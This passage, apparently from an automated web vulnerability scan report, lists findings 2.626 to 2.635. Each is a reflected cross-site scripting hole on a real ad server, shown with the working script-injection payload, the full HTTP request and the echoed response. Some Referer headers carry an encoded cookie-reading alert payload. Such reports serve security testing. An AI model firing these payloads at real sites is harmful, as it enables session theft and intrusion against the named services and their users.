<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?83ac0"><script>alert(1)</script>4fe2990056=1" target="_new">
...[SNIP]...

2.626. http://media.sensis.com.au/hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6d0"><script>alert(1)</script>c600da87e50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver6d6d0"><script>alert(1)</script>c600da87e50/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:52 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 467
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c00000000000000006d6d0"><script>alert(1)</script>c600da87e50/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782/relocate=http://clk.redcated/O
...[SNIP]...

2.627. http://media.sensis.com.au/hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef01a"><script>alert(1)</script>63c52abf646 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomef01a"><script>alert(1)</script>63c52abf646=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:53 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 467
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_randomef01a"><script>alert(1)</script>63c52abf646=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782/relocate=http://clk.redcated/OMA/go/27018
...[SNIP]...

2.628. http://media.sensis.com.au/hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39391"><script>alert(1)</script>38547484e67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782?39391"><script>alert(1)</script>38547484e67=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:51 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 478
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000308680000000000000000/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782?39391"><script>alert(1)</script>38547484e67=1&relocate=http://clk.redcated/OMA/go/255858459/direct/01/" target="_blank">
...[SNIP]...

2.629. http://media.sensis.com.au/hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d179"><script>alert(1)</script>56865d7dbc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver7d179"><script>alert(1)</script>56865d7dbc6/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:37 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 507
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e000000007d179"><script>alert(1)</script>56865d7dbc6/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT
...[SNIP]...

2.630. http://media.sensis.com.au/hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58d3"><script>alert(1)</script>ba515e11b58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randoma58d3"><script>alert(1)</script>ba515e11b58=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:38 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 507
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e00000000/acc_randoma58d3"><script>alert(1)</script>ba515e11b58=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746
...[SNIP]...

2.631. http://media.sensis.com.au/hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f937"><script>alert(1)</script>c6f888998e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?6f937"><script>alert(1)</script>c6f888998e1=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:36 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 510
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002179792cb881e00000000/acc_random=607640165916/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?6f937"><script>alert(1)</script>c6f888998e1=1" target="_new">
...[SNIP]...

2.632. http://media.sensis.com.au/hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d29f9"><script>alert(1)</script>0a444860c0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverd29f9"><script>alert(1)</script>0a444860c0d/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:35 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffcd29f9"><script>alert(1)</script>0a444860c0d/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pag
...[SNIP]...

2.633. http://media.sensis.com.au/hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed742"><script>alert(1)</script>ee6255739ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomed742"><script>alert(1)</script>ee6255739ef=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:36 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_randomed742"><script>alert(1)</script>ee6255739ef=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=1469952
...[SNIP]...

2.634. http://media.sensis.com.au/hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd342"><script>alert(1)</script>f60f9df889d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?cd342"><script>alert(1)</script>f60f9df889d=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:34 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 436
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random=684881722294/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?cd342"><script>alert(1)</script>f60f9df889d=1" target="_new">
...[SNIP]...

2.635. http://media.sensis.com.au/hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19edf"><script>alert(1)</script>eba141e2a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver19edf"><script>alert(1)</script>eba141e2a02/acc_random=713638473393/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
